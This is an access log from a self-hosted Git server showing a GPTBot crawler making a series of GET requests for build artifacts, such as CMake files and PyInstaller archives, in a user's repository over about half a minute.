"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10779] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:15:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:15:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10340] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:15:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:15:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10950] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11828] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10951] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11273] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9941] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14344] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10075] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16051] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10074] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12012] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21844] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24024] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" 